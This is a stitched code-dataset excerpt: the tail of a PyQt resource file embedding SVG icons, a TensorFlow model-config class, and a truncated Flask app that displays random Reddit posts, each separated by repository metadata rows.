-8859-1\x22?>\x0d\x0a<!--\
Generator: Adob\
e Illustrator 19\
.0.0, SVG Export\
Plug-In . SVG V\
ersion: 6.00 Bui\
ld 0) -->\x0d\x0a<svg\
version=\x221.1\x22 i\
d=\x22Layer_1\x22 xmln\
s=\x22http://www.w3\
.org/2000/svg\x22 x\
mlns:xlink=\x22http\
://www.w3.org/19\
99/xlink\x22 x=\x220px\
\x22 y=\x220px\x22\x0d\x0a\x09 vie\
wBox=\x220 0 309.26\
7 309.267\x22 style\
=\x22enable-backgro\
und:new 0 0 309.\
267 309.267;\x22 xm\
l:space=\x22preserv\
e\x22>\x0d\x0a<g>\x0d\x0a\x09<path\
style=\x22fill:#D0\
994B;\x22 d=\x22M260.9\
44,43.491H125.64\
c0,0-18.324-28.9\
94-28.994-28.994\
H48.323c-10.67,0\
-19.329,8.65-19.\
329,19.329\x0d\x0a\x09\x09v2\
22.286c0,10.67,8\
.659,19.329,19.3\
29,19.329h212.62\
1c10.67,0,19.329\
-8.659,19.329-19\
.329V62.82\x0d\x0a\x09\x09C2\
80.273,52.15,271\
.614,43.491,260.\
944,43.491z\x22/>\x0d\x0a\
\x09<path style=\x22fi\
ll:#E4E7E7;\x22 d=\x22\
M28.994,72.484h2\
51.279v77.317H28\
.994V72.484z\x22/>\x0d\
\x0a\x09<path style=\x22f\
ill:#F4B459;\x22 d=\
\x22M19.329,91.814h\
270.609c10.67,0,\
19.329,8.65,19.3\
29,19.329l-19.32\
9,164.298\x0d\x0a\x09\x09c0,\
10.67-8.659,19.3\
29-19.329,19.329\
H38.658c-10.67,0\
-19.329-8.659-19\
.329-19.329L0,11\
1.143C0,100.463,\
8.659,91.814,19.\
329,91.814z\x0d\x0a\x09\x09\x22\
/>\x0d\x0a</g>\x0d\x0a<g>\x0d\x0a<\
/g>\x0d\x0a<g>\x0d\x0a</g>\x0d\x0a\
<g>\x0d\x0a</g>\x0d\x0a<g>\x0d\x0a\
</g>\x0d\x0a<g>\x0d\x0a</g>\x0d\
\x0a<g>\x0d\x0a</g>\x0d\x0a<g>\x0d\
\x0a</g>\x0d\x0a<g>\x0d\x0a</g>\
\x0d\x0a<g>\x0d\x0a</g>\x0d\x0a<g>\
\x0d\x0a</g>\x0d\x0a<g>\x0d\x0a</g\
>\x0d\x0a<g>\x0d\x0a</g>\x0d\x0a<g\
>\x0d\x0a</g>\x0d\x0a<g>\x0d\x0a</\
g>\x0d\x0a<g>\x0d\x0a</g>\x0d\x0a<\
/svg>\x0d\x0a\
\x00\x00\x02\x5c\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M17,7.6v6.\
8L11,18l-6-3.6V7\
.6L11,4C11,4,17,\
7.6,17,7.6z M11.\
5,3.1c-0.3-0.2-0\
.7-0.2-1,0l-6,3.\
6C4.2,6.9,4,7.2,\
4,7.6v6.8\x0d\x0a\x09c0,0\
.4,0.2,0.7,0.5,0\
.9l6,3.6c0.3,0.2\
,0.7,0.2,1,0l6-3\
.6c0.3-0.2,0.5-0\
.5,0.5-0.9V7.6c0\
-0.4-0.2-0.7-0.5\
-0.9L11.5,3.1z\x22/\
>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03\xc4\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 focusabl\
e=\x22false\x22 xmlns=\
\x22http://www.w3.o\
rg/2000/svg\x22 xml\
ns:xlink=\x22http:/\
/www.w3.org/1999\
/xlink\x22\x0d\x0a\x09 x=\x220p\
x\x22 y=\x220px\x22 viewB\
ox=\x220 0 512 512\x22\
style=\x22enable-b\
ackground:new 0 \
0 512 512;\x22 xml:\
space=\x22preserve\x22\
>\x0d\x0a<style type=\x22\
text/css\x22>\x0d\x0a\x09.st\
0{fill:#941400;s\
troke:#000000;st\
roke-width:5;str\
oke-miterlimit:1\
0;}\x0d\x0a\x09.st1{fill:\
#FFFFFF;}\x0d\x0a\x09.st2\
{fill:#941400;}\x0d\
\x0a</style>\x0d\x0a<circ\
le class=\x22st0\x22 c\
x=\x22256\x22 cy=\x22256\x22\
r=\x22256\x22/>\x0d\x0a<pat\
h class=\x22st1\x22 d=\
\x22M349.8,349.8c5.\
59,12.03,0.44,26\
.31-11.56,31.94c\
-3.31,1.53-6.75,\
2.25-10.19,2.25c\
-9,0-17.66-5.13-\
21.75-13.81\x0d\x0a\x09l-\
38.46-82.19H208v\
72c0,13.25-10.75\
,24-24,24s-24-10\
.75-24-24V152c0-\
13.25,10.75-24,2\
4-24l88,0c44.13,\
0,80,35.88,80,80\
\x0d\x0a\x09c0,28.32-14.8\
7,53.09-37.12,67\
.31L349.8,349.8z\
\x22/>\x0d\x0a<path class\
=\x22st2\x22 d=\x22M272,1\
76h-64v64h64c17.\
66,0,32-14.34,32\
-32S289.7,176,27\
2,176z\x22/>\x0d\x0a</svg\
>\x0d\x0a\
\x00\x00\x03p\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 20 20\x22 sty\
le=\x22enable-backg\
round:new 0 0 20\
20;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<st\
yle type=\x22text/c\
ss\x22>\x0d\x0a\x09.st0{fill\
-rule:evenodd;cl\
ip-rule:evenodd;\
}\x0d\x0a</style>\x0d\x0a<pa\
th class=\x22st0\x22 d\
=\x22M8.5,14c3,0,5.\
5-2.5,5.5-5.5S11\
.5,3,8.5,3l0,0C5\
.5,3,3,5.5,3,8.5\
S5.5,14,8.5,14z \
M15,8.5c0,3.6-2.\
9,6.5-6.5,6.5\x0d\x0a\x09\
S2,12.1,2,8.5S4.\
9,2,8.5,2S15,4.9\
,15,8.5z\x22/>\x0d\x0a<pa\
th d=\x22M12.3,13.7\
c0,0,0.1,0.1,0.1\
,0.1l3.9,3.8c0.4\
,0.4,1,0.4,1.4,0\
s0.4-1,0-1.4l-3.\
9-3.9c0,0-0.1-0.\
1-0.1-0.1\x0d\x0a\x09C13.\
3,12.9,12.9,13.3\
,12.3,13.7L12.3,\
13.7z\x22/>\x0d\x0a<path \
class=\x22st0\x22 d=\x22M\
5,8.5C5,8.2,5.2,\
8,5.5,8h6C11.8,8\
,12,8.2,12,8.5S1\
1.8,9,11.5,9h-6C\
5.2,9,5,8.8,5,8.\
5z\x22/>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x02\x8d\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22em\
oji\x22 xmlns=\x22http\
://www.w3.org/20\
00/svg\x22 xmlns:xl\
ink=\x22http://www.\
w3.org/1999/xlin\
k\x22 x=\x220px\x22 y=\x220p\
x\x22\x0d\x0a\x09 viewBox=\x220\
0 72 72\x22 style=\
\x22enable-backgrou\
nd:new 0 0 72 72\
;\x22 xml:space=\x22pr\
eserve\x22>\x0d\x0a<style\
type=\x22text/css\x22\
>\x0d\x0a\x09.st0{opacity\
:0.6;}\x0d\x0a\x09.st1{fi\
ll:#0D6EFD;}\x0d\x0a\x09.\
st2{fill:none;st\
roke:#000000;str\
oke-width:2;stro\
ke-linejoin:roun\
d;}\x0d\x0a</style>\x0d\x0a<\
g id=\x22color\x22 cla\
ss=\x22st0\x22>\x0d\x0a\x09<cir\
cle class=\x22st1\x22 \
cx=\x2236\x22 cy=\x2236\x22 \
r=\x2230\x22/>\x0d\x0a</g>\x0d\x0a\
<g id=\x22line\x22>\x0d\x0a\x09\
<circle class=\x22s\
t2\x22 cx=\x2236\x22 cy=\x22\
36\x22 r=\x2231\x22/>\x0d\x0a</\
g>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x02\x8d\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22em\
oji\x22 xmlns=\x22http\
://www.w3.org/20\
00/svg\x22 xmlns:xl\
ink=\x22http://www.\
w3.org/1999/xlin\
k\x22 x=\x220px\x22 y=\x220p\
x\x22\x0d\x0a\x09 viewBox=\x220\
0 72 72\x22 style=\
\x22enable-backgrou\
nd:new 0 0 72 72\
;\x22 xml:space=\x22pr\
eserve\x22>\x0d\x0a<style\
type=\x22text/css\x22\
>\x0d\x0a\x09.st0{opacity\
:0.6;}\x0d\x0a\x09.st1{fi\
ll:#FFC107;}\x0d\x0a\x09.\
st2{fill:none;st\
roke:#000000;str\
oke-width:2;stro\
ke-linejoin:roun\
d;}\x0d\x0a</style>\x0d\x0a<\
g id=\x22color\x22 cla\
ss=\x22st0\x22>\x0d\x0a\x09<cir\
cle class=\x22st1\x22 \
cx=\x2236\x22 cy=\x2236\x22 \
r=\x2230\x22/>\x0d\x0a</g>\x0d\x0a\
<g id=\x22line\x22>\x0d\x0a\x09\
<circle class=\x22s\
t2\x22 cx=\x2236\x22 cy=\x22\
36\x22 r=\x2231\x22/>\x0d\x0a</\
g>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03\xbc\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M4.5,5.5C4\
.5,4.7,5.2,4,6,4\
h10c0.8,0,1.5,0.\
7,1.5,1.5v3.6c1.\
1,0.3,1.7,1.4,1.\
4,2.4c-0.2,0.7-0\
.7,1.3-1.4,1.4v3\
.6\x0d\x0a\x09c0,0.8-0.7,\
1.5-1.5,1.5H6c-0\
.8,0-1.5-0.7-1.5\
-1.5v-3.6c-1.1-0\
.3-1.7-1.4-1.4-2\
.4c0.2-0.7,0.7-1\
.3,1.4-1.4V5.5z \
M5.5,9.1\x0d\x0a\x09c1.1,\
0.3,1.7,1.4,1.4,\
2.4c-0.2,0.7-0.7\
,1.3-1.4,1.4v3.6\
C5.5,16.8,5.7,17\
,6,17h10c0.3,0,0\
.5-0.2,0.5-0.5v-\
3.6\x0d\x0a\x09c-1.1-0.3-\
1.7-1.4-1.4-2.4c\
0.2-0.7,0.7-1.3,\
1.4-1.4V5.5C16.5\
,5.2,16.3,5,16,5\
H6C5.7,5,5.5,5.2\
,5.5,5.5V9.1z M5\
,10c-0.6,0-1,0.4\
-1,1\x0d\x0a\x09c0,0.6,0.\
4,1,1,1s1-0.4,1-\
1C6,10.4,5.6,10,\
5,10z M17,10c-0.\
6,0-1,0.4-1,1c0,\
0.6,0.4,1,1,1s1-\
0.4,1-1C18,10.4,\
17.6,10,17,10z\x22/\
>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03\xef\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M5,4C4.4,4\
,4,4.4,4,5s0.4,1\
,1,1s1-0.4,1-1S5\
.6,4,5,4z M3,5c0\
-1.1,0.9-2,2-2c0\
.9,0,1.7,0.6,1.9\
,1.5h8.1\x0d\x0a\x09c0.3-\
1.1,1.4-1.7,2.4-\
1.4s1.7,1.4,1.4,\
2.4c-0.2,0.7-0.7\
,1.3-1.4,1.4v8.1\
c1.1,0.3,1.7,1.4\
,1.4,2.4s-1.4,1.\
7-2.4,1.4\x0d\x0a\x09c-0.\
7-0.2-1.3-0.7-1.\
4-1.4H6.9c-0.3,1\
.1-1.4,1.7-2.4,1\
.4s-1.7-1.4-1.4-\
2.4c0.2-0.7,0.7-\
1.3,1.4-1.4V6.9C\
3.6,6.7,3,5.9,3,\
5z M5.5,6.9\x0d\x0a\x09v8\
.1c0.7,0.2,1.3,0\
.7,1.4,1.4h8.1c0\
.2-0.7,0.7-1.3,1\
.4-1.4V6.9c-0.7-\
0.2-1.3-0.7-1.4-\
1.4H6.9C6.8,6.2,\
6.2,6.8,5.5,6.9z\
M17,4\x0d\x0a\x09c-0.6,0\
-1,0.4-1,1s0.4,1\
,1,1s1-0.4,1-1S1\
7.6,4,17,4z M5,1\
6c-0.6,0-1,0.4-1\
,1s0.4,1,1,1s1-0\
.4,1-1S5.6,16,5,\
16z M17,16\x0d\x0a\x09c-0\
.6,0-1,0.4-1,1s0\
.4,1,1,1s1-0.4,1\
-1S17.6,16,17,16\
z\x22/>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03H\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M8.5,10C8.\
2,10,8,10.2,8,10\
.5S8.2,11,8.5,11\
h5c0.3,0,0.5-0.2\
,0.5-0.5S13.8,10\
,13.5,10H8.5z M8\
,12.5C8,12.2,8.2\
,12,8.5,12h5\x0d\x0a\x09c\
0.3,0,0.5,0.2,0.\
5,0.5S13.8,13,13\
.5,13h-5C8.2,13,\
8,12.8,8,12.5z M\
8,14.5C8,14.2,8.\
2,14,8.5,14h2c0.\
3,0,0.5,0.2,0.5,\
0.5\x0d\x0a\x09S10.8,15,1\
0.5,15h-2C8.2,15\
,8,14.8,8,14.5z\x22\
/>\x0d\x0a<path d=\x22M12\
.5,3H7C5.9,3,5,3\
.9,5,5v12c0,1.1,\
0.9,2,2,2h8c1.1,\
0,2-0.9,2-2V7.5L\
12.5,3z M12.5,4v\
2c0,0.8,0.7,1.5,\
1.5,1.5h2V17\x0d\x0a\x09c\
0,0.6-0.4,1-1,1H\
7c-0.6,0-1-0.4-1\
-1V5c0-0.6,0.4-1\
,1-1H12.5z\x22/>\x0d\x0a<\
/svg>\x0d\x0a\
\x00\x00\x03\xd1\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M17,7.5V17\
c0,1.1-0.9,2-2,2\
H7c-1.1,0-2-0.9-\
2-2V5c0-1.1,0.9-\
2,2-2h5.5L17,7.5\
z M14,7.5c-0.8,0\
-1.5-0.7-1.5-1.5\
V4H7\x0d\x0a\x09C6.4,4,6,\
4.4,6,5v12c0,0.6\
,0.4,1,1,1h8c0.6\
,0,1-0.4,1-1V7.5\
H14z\x22/>\x0d\x0a<path d\
=\x22M7.5,15.5C7.5,\
15.2,7.7,15,8,15\
h3c0.3,0,0.5,0.2\
,0.5,0.5S11.3,16\
,11,16H8C7.7,16,\
7.5,15.8,7.5,15.\
5z M7.5,13.5\x0d\x0a\x09C\
7.5,13.2,7.7,13,\
8,13h6c0.3,0,0.5\
,0.2,0.5,0.5S14.\
3,14,14,14H8C7.7\
,14,7.5,13.8,7.5\
,13.5z M9.1,9.8l\
1.3,0.9l1.9-1.9\x0d\
\x0a\x09c0.1-0.1,0.2-0\
.1,0.3,0l1.9,1v1\
.8c0,0.3-0.2,0.5\
-0.5,0.5H8c-0.3,\
0-0.5-0.2-0.5-0.\
5V11C7.5,11,9,9.\
7,9.1,9.8z M9.3,\
9\x0d\x0a\x09C9.7,9,10,8.\
7,10,8.3c0-0.4-0\
.3-0.8-0.8-0.8S8\
.5,7.8,8.5,8.3C8\
.5,8.7,8.8,9,9.3\
,9z\x22/>\x0d\x0a</svg>\x0d\x0a\
\
\x00\x00\x02\x8d\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22em\
oji\x22 xmlns=\x22http\
://www.w3.org/20\
00/svg\x22 xmlns:xl\
ink=\x22http://www.\
w3.org/1999/xlin\
k\x22 x=\x220px\x22 y=\x220p\
x\x22\x0d\x0a\x09 viewBox=\x220\
0 72 72\x22 style=\
\x22enable-backgrou\
nd:new 0 0 72 72\
;\x22 xml:space=\x22pr\
eserve\x22>\x0d\x0a<style\
type=\x22text/css\x22\
>\x0d\x0a\x09.st0{opacity\
:0.6;}\x0d\x0a\x09.st1{fi\
ll:#198754;}\x0d\x0a\x09.\
st2{fill:none;st\
roke:#000000;str\
oke-width:2;stro\
ke-linejoin:roun\
d;}\x0d\x0a</style>\x0d\x0a<\
g id=\x22color\x22 cla\
ss=\x22st0\x22>\x0d\x0a\x09<cir\
cle class=\x22st1\x22 \
cx=\x2236\x22 cy=\x2236\x22 \
r=\x2230\x22/>\x0d\x0a</g>\x0d\x0a\
<g id=\x22line\x22>\x0d\x0a\x09\
<circle class=\x22s\
t2\x22 cx=\x2236\x22 cy=\x22\
36\x22 r=\x2231\x22/>\x0d\x0a</\
g>\x0d\x0a</svg>\x0d\x0a\
"
qt_resource_name = b"\
\x00\x05\
\x00o\xa6S\
\x00i\
\x00c\x00o\x00n\x00s\
\x00\x08\
\x06\x98T'\
\x00p\
\x00o\x00s\x00e\x00.\x00s\x00v\x00g\
\x00\x07\
\x0a7Z\x07\
\x00c\
\x00m\x00d\x00.\x00s\x00v\x00g\
\x00\x09\
\x09e\x83\xe7\
\x00e\
\x00r\x00r\x00o\x00r\x00.\x00s\x00v\x00g\
\x00\x0a\
\x08I\x05g\
\x00l\
\x00i\x00g\x00a\x00n\x00d\x00.\x00s\x00v\x00g\
\x00\x09\
\x08\x88\xa9\x07\
\x00s\
\x00h\x00a\x00r\x00e\x00.\x00s\x00v\x00g\
\x00\x0a\
\x04\x11v\x07\
\x00z\
\x00o\x00o\x00m\x00i\x00n\x00.\x00s\x00v\x00g\
\x00\x07\
\x09kZ\x07\
\x00b\
\x00o\x00x\x00.\x00s\x00v\x00g\
\x00\x08\
\x05\xe2T\xa7\
\x00l\
\x00o\x00g\x00o\x00.\x00s\x00v\x00g\
\x00\x07\
\x04\xcaZ'\
\x00n\
\x00e\x00w\x00.\x00s\x00v\x00g\
\x00\x09\
\x07\xd8\xba\xa7\
\x00i\
\x00m\x00a\x00g\x00e\x00.\x00s\x00v\x00g\
\x00\x0a\
\x0a\xc8\xf6\x87\
\x00f\
\x00o\x00l\x00d\x00e\x00r\x00.\x00s\x00v\x00g\
\x00\x0d\
\x0a@.\x07\
\x00m\
\x00o\x00l\x00e\x00c\x00u\x00l\x00a\x00r\x00.\x00s\x00v\x00g\
\x00\x0c\
\x04rb'\
\x00r\
\x00e\x00c\x00e\x00p\x00t\x00o\x00r\x00.\x00s\x00v\x00g\
\x00\x0b\
\x07\xc5\x96G\
\x00z\
\x00o\x00o\x00m\x00o\x00u\x00t\x00.\x00s\x00v\x00g\
\x00\x07\
\x09\xc1Z'\
\x00r\
\x00u\x00n\x00.\x00s\x00v\x00g\
\x00\x08\
\x0cGT\x07\
\x00p\
\x00e\x00n\x00d\x00.\x00s\x00v\x00g\
\x00\x07\
\x01UZ'\
\x00j\
\x00o\x00b\x00.\x00s\x00v\x00g\
\x00\x0c\
\x05g\xd3\x87\
\x00b\
\x00o\x00u\x00n\x00d\x00i\x00n\x00g\x00.\x00s\x00v\x00g\
\x00\x08\
\x06\xc1T\x07\
\x00o\
\x00p\x00e\x00n\x00.\x00s\x00v\x00g\
\x00\x08\
\x08\xc8U\xe7\
\x00s\
\x00a\x00v\x00e\x00.\x00s\x00v\x00g\
\x00\x0b\
\x0cS)\xe7\
\x00s\
\x00u\x00c\x00c\x00e\x00s\x00s\x00.\x00s\x00v\x00g\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x15\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x01\x92\x00\x00\x00\x00\x00\x01\x00\x007\x9b\
\x00\x00\x01\x806k\x809\
\x00\x00\x00\x84\x00\x00\x00\x00\x00\x01\x00\x00\x0f{\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01.\x00\x00\x00\x00\x00\x01\x00\x00+=\
\x00\x00\x01\x806k\x80>\
\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x01\x00\x00\x1e\xad\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01\xa6\x00\x00\x00\x00\x00\x01\x00\x00;[\
\x00\x00\x01\x806k\x809\
\x00\x00\x00\xb2\x00\x00\x00\x00\x00\x01\x00\x00\x16\x11\
\x00\x00\x01\x806k\x80=\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01\xc4\x00\x00\x00\x00\x00\x01\x00\x00?N\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01L\x00\x00\x00\x00\x00\x01\x00\x00/\x05\
\x00\x00\x01\x806k\x80>\
\x00\x00\x00\xdc\x00\x00\x00\x00\x00\x01\x00\x00!\xad\
\x00\x00\x01\x80\x94\xc9\xa3y\
\x00\x00\x00R\x00\x00\x00\x00\x00\x01\x00\x00\x08\x84\
\x00\x00\x01\x806k\x80:\
\x00\x00\x00l\x00\x00\x00\x00\x00\x01\x00\x00\x0b\xac\
\x00\x00\x01\x80\x94\xceT\xed\
\x00\x00\x01\xda\x00\x00\x00\x00\x00\x01\x00\x00B\x9a\
\x00\x00\x01\x806k\x80>\
\x00\x00\x00:\x00\x00\x00\x00\x00\x01\x00\x00\x05\xf3\
\x00\x00\x01\x806k\x809\
\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x01\x00\x00\x13F\
\x00\x00\x01\x806k\x809\
\x00\x00\x01h\x00\x00\x00\x00\x00\x01\x00\x002y\
\x00\x00\x01\x806k\x80>\
\x00\x00\x00&\x00\x00\x00\x00\x00\x01\x00\x00\x02\xdc\
\x00\x00\x01\x806k\x809\
\x00\x00\x01\x0e\x00\x00\x00\x00\x00\x01\x00\x00(\xdd\
\x00\x00\x01\x806k\x80=\
\x00\x00\x00\xf4\x00\x00\x00\x00\x00\x01\x00\x00$Q\
\x00\x00\x01\x806k\x809\
\x00\x00\x01|\x00\x00\x00\x00\x00\x01\x00\x005\x0a\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01\xf0\x00\x00\x00\x00\x00\x01\x00\x00Fo\
\x00\x00\x01\x806k\x80>\
"
def qInitResources():
QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 21.801605 | 96 | 0.636434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 29,534 | 0.98809 |
446b3bdff2cf45475da4bdea7030cc7a2b669e73 | 1,405 | py | Python | procyclist/config.py | Arham-Aalam/procyclist_performance | 494f86fb76472d9642ff4a283bdc91cba4770edc | [
"MIT"
] | 11 | 2018-09-03T10:38:14.000Z | 2021-04-21T23:51:32.000Z | procyclist/config.py | Arham-Aalam/procyclist_performance | 494f86fb76472d9642ff4a283bdc91cba4770edc | [
"MIT"
] | 10 | 2018-11-28T20:35:54.000Z | 2021-05-24T09:01:18.000Z | procyclist/config.py | Arham-Aalam/procyclist_performance | 494f86fb76472d9642ff4a283bdc91cba4770edc | [
"MIT"
] | 6 | 2018-11-13T12:12:31.000Z | 2022-01-06T19:13:01.000Z | import abc
import numpy as np
import tensorflow as tf
class Config(metaclass=abc.ABCMeta):
_attributes = [
'batch_size',
'dropout',
'input_dim',
'inputs',
'learning_rate',
'max_time',
'n_epochs',
'n_hidden',
'n_layers',
'output_dim',
'outputs',
]
@classmethod
@abc.abstractmethod
def load(cls, infile):
return np.load(infile)
def save(self, outfile):
archive = dict((attr, getattr(self, attr)) for attr in self._attributes)
return np.savez_compressed(outfile, **archive)
class DefaultConfig(Config):
# Training parameters
batch_size = 500
learning_rate = 0.01
max_time = 5000
n_epochs = 2000
# Model parameters
dropout = 0.7
n_hidden = 100
n_layers = 2
def __init__(self, inputs, outputs):
self.inputs = inputs
self.outputs = outputs
self.input_dim = len(inputs)
self.output_dim = len(outputs)
# Initialize optimizer
optimizer = tf.train.AdamOptimizer
self.optimizer = optimizer(learning_rate=self.learning_rate)
@classmethod
def load(cls, infile):
archive = super(cls).load(infile)
self = cls(archive['inputs'], archive['outputs'])
for attr in self._attributes:
setattr(self, attr, archive[attr])
return self
| 23.032787 | 80 | 0.600712 | 1,344 | 0.956584 | 0 | 0 | 338 | 0.240569 | 0 | 0 | 194 | 0.138078 |
446bc24aa0d51aebb62f5751f6f5954d3e059d78 | 1,223 | py | Python | main.py | madhavan-raja/universal-reddit-reader | fb0286eba0465f969c62d96982631fccaf0a94bb | [
"MIT"
] | null | null | null | main.py | madhavan-raja/universal-reddit-reader | fb0286eba0465f969c62d96982631fccaf0a94bb | [
"MIT"
] | null | null | null | main.py | madhavan-raja/universal-reddit-reader | fb0286eba0465f969c62d96982631fccaf0a94bb | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request, url_for
import praw
import json
import random
import markdown2
creds = json.load(open("credentials.json"))
subs = [
'nosleep',
'ProRevenge',
'NuclearRevenge'
]
LIMIT = 100
app = Flask(__name__)
@app.route('/')
def home():
return render_template('index.html', subs=subs)
@app.route('/<sub_name>')
def display_post(sub_name):
reddit = praw.Reddit(client_id=creds['client_id'], client_secret=creds['client_secret'], username=creds['username'], password=creds['password'], user_agent=creds['user_agent'])
try:
sub = reddit.subreddit(sub_name)
sub_hot = sub.hot(limit=LIMIT)
random_post = random.choice(list(sub_hot))
except:
return render_template('error.html')
body_text = random_post.selftext
body = markdown2.markdown(random_post.selftext)
return render_template("display_post.html", sub=random_post.subreddit.display_name, author=random_post.author.name, title=random_post.title, url=random_post.url, upvote_ratio=int(random_post.upvote_ratio * 100), body=body, body_text=body_text)
if __name__ == '__main__':
